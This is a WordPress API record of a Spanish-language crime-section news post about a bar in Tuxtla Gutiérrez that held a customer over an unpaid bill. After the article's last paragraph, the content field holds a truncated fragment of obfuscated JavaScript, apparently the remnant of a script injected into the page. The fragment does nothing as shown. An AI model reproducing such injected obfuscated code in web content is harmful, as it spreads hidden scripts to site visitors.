{"id":12047,"date":"2023-09-30T03:13:46","date_gmt":"2023-09-30T03:13:46","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=12047"},"modified":"2023-09-30T03:13:47","modified_gmt":"2023-09-30T03:13:47","slug":"retienen-a-cliente-en-bar-por-no-paga-la-cuenta","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=12047","title":{"rendered":"Retienen a cliente en bar por no paga la cuenta"},"content":{"rendered":"\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"768\" height=\"1024\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/09\/FB_IMG_1696041920209-768x1024.jpg\" alt=\"\" class=\"wp-image-12048\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/09\/FB_IMG_1696041920209-768x1024.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/09\/FB_IMG_1696041920209-225x300.jpg 225w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/09\/FB_IMG_1696041920209.jpg 1080w\" sizes=\"auto, (max-width: 768px) 100vw, 768px\" \/><\/figure>\n\n\n\n<p>Jairo Camacho.<\/p>\n\n\n\n<p>Agencia ReporteCiudano, 29 de septiembre del 2023. Tuxtla Guti\u00e9rrez. &#8211; Este viernes por la ma\u00f1ana se present\u00f3 un altercado en el Bar la Taberna, ubicado en la 15 Poniente y Tercera Norte de Tuxtla Guti\u00e9rrez, cuando el personal retuvo a un cliente.<\/p>\n\n\n\n<p>Los reportes oficiales informaron que, un hombre fue quien pidi\u00f3 la ayuda cerca de las 11 de la ma\u00f1ana.<\/p>\n\n\n\n<p>Al arribo de los elementos polic\u00edacos, se les inform\u00f3 que, un sujeto ingres\u00f3 a consumir desde la 1 de la ma\u00f1ana y al salir cerca de las 9 de la ma\u00f1ana no contaba con efectivo.<\/p>\n\n\n\n<p>Por este motivo realiz\u00f3 una transferencia pero el encargado del lugar indic\u00f3 que no llegaba a la cuenta realizada.<\/p>\n\n\n\n<p>Al dialogar con este hombre, tom\u00f3 una actitud prepotente y amenaz\u00f3 afirmando que era de la PGR.<\/p>\n\n\n\n<p>Los elementos tomaron datos del lugar y se retiraron, mientras que, el personal del bar intent\u00f3 contactar a un familiar del deudor para que liquidara la cuenta.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>Jairo Camacho. Agencia ReporteCiudano, 29 de septiembre del 2023. Tuxtla Guti\u00e9rrez. &#8211; Este viernes por la ma\u00f1ana se present\u00f3 un altercado en el Bar la Taberna, ubicado en la 15 Poniente y Tercera Norte de Tuxtla Guti\u00e9rrez, cuando el personal retuvo a un cliente. Los reportes oficiales informaron que, un hombre fue quien pidi\u00f3 la &hellip;<\/p>\n","protected":false},"author":2,"featured_media":12048,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[4],"tags":[],"class_list":["post-12047","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-roja"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/12047","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=12047"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/12047\/revisions"}],"predecessor-version":[{"id":12049,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/12047\/revisions\/12049"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/12048"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=12047"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=12047"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=12047"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}